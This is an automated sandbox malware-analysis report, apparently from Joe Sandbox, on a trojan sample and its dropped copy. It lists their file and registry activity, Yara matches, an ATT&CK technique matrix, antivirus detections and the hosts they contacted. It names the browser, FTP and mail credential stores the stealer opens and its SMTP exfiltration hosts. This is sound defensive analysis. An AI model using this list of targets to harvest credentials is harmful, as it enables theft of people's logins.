                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Users\user\Desktop\kAsh3nmsgs.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Users\user\AppData\Roaming\HHhSyZN.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Users\user\AppData\Roaming\HHhSyZN.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara match; File source: 8.2.kAsh3nmsgs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.4c1f8f8.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.4be4ed8.4.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.4c1f8f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000D.00000002.4150523967.000000000301B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: kAsh3nmsgs.exe PID: 1216, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: kAsh3nmsgs.exe PID: 7412, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: HHhSyZN.exe PID: 7512, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: HHhSyZN.exe PID: 7836, type: MEMORYSTR
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.47324e8.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.47324e8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.7e10000.5.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.2f9624c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.30b62a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1730748161.0000000004719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.1769194056.0000000003039000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1730005072.0000000002F19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

                      Source: Yara match; File source: 8.2.kAsh3nmsgs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.4c1f8f8.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.4be4ed8.4.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.4c1f8f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000D.00000002.4150523967.000000000301B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: kAsh3nmsgs.exe PID: 1216, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: kAsh3nmsgs.exe PID: 7412, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: HHhSyZN.exe PID: 7512, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: HHhSyZN.exe PID: 7836, type: MEMORYSTR
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.47324e8.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.47324e8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.7e10000.5.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.kAsh3nmsgs.exe.2f9624c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.HHhSyZN.exe.30b62a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1730748161.0000000004719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.1769194056.0000000003039000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1730005072.0000000002F19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 3 Obfuscated Files or Information | 11 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Scheduled Task/Job | 2 Software Packing | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 11 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

                      [Figure: Behavior Graph. ID: 1589087; Sample: kAsh3nmsgs.exe; Startdate: 11/01/2025; Architecture: WINDOWS; Score: 100]

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| kAsh3nmsgs.exe | 79% | ReversingLabs | Win32.Trojan.Jalapeno | |
| kAsh3nmsgs.exe | 61% | Virustotal | | Browse |
| kAsh3nmsgs.exe | 100% | Avira | HEUR/AGEN.1305452 | |
| kAsh3nmsgs.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Roaming\HHhSyZN.exe | 100% | Avira | HEUR/AGEN.1305452 | |
| C:\Users\user\AppData\Roaming\HHhSyZN.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Roaming\HHhSyZN.exe | 79% | ReversingLabs | Win32.Trojan.Jalapeno | |

                      No Antivirus matches
                      No Antivirus matches
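
| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| http://crl.gl | 0% | Avira URL Cloud | safe | |
| http://crl.gl? | 0% | Avira URL Cloud | safe | |
| http://crl.globalsigx | 0% | Avira URL Cloud | safe | |
| http://ocsp2.globalsig | 0% | Avira URL Cloud | safe | |
| http://crl.g | 0% | Avira URL Cloud | safe | |
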
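| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| smtp.yandex.ru | 77.88.21.158 | true | false | | high |
| api.ipify.org | 104.26.13.205 | true | false | | high |
| smtp.yandex.com | unknown | unknown | false | | high |
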
| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://api.ipify.org/ | false | | high |

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersGkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers/?kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bThekAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://account.dyn.com/kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4146034790.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers?kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.tiro.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designerskAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.goodfont.co.krkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.ipify.org/tkAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://smtp.yandex.comkAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003415000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003384000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003161000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.000000000324F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.carterandcone.comlkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sajatypeworks.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.typography.netDkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.fontbureau.com/designers/cabarga.htmlNkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn/cThekAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/staff/dennis.htmkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.ipify.orgkAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4146027823.0000000000434000.00000040.00000400.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cnkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designers/frere-user.htmlkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.glkAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4147346234.0000000001376000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://crl.gkAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190331509.0000000008B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.jiyu-kobo.co.jp/kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://ocsp2.globalsigkAsh3nmsgs.exe, 00000008.00000002.4190331509.0000000008B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.galapagosdesign.com/DPleasekAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.fontbureau.com/designers8kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.fonts.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.sandoll.co.krkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.urwpp.deDPleasekAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.zhongyicts.com.cnkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekAsh3nmsgs.exe, 00000000.00000002.1730005072.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1769194056.000000000331F000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.sakkal.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crl.gl?kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://crl.globalsigxHHhSyZN.exe, 0000000D.00000002.4187909040.0000000009423000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 77.88.21.158 | smtp.yandex.ru | Russian Federation | 13238 | YANDEXRU | false |
| 104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589087
Start date and time: 2025-01-11 09:22:31 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: kAsh3nmsgs.exe (renamed because original name is a hash value)
Original Sample Name: df3a573b20ebe9b8a1d4769ec25f439b2738ea14008d9bbf469234033845e6ca.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@19/15@2/2
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 184
                                                                                          • Number of non-executed functions: 28
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 13.107.246.45
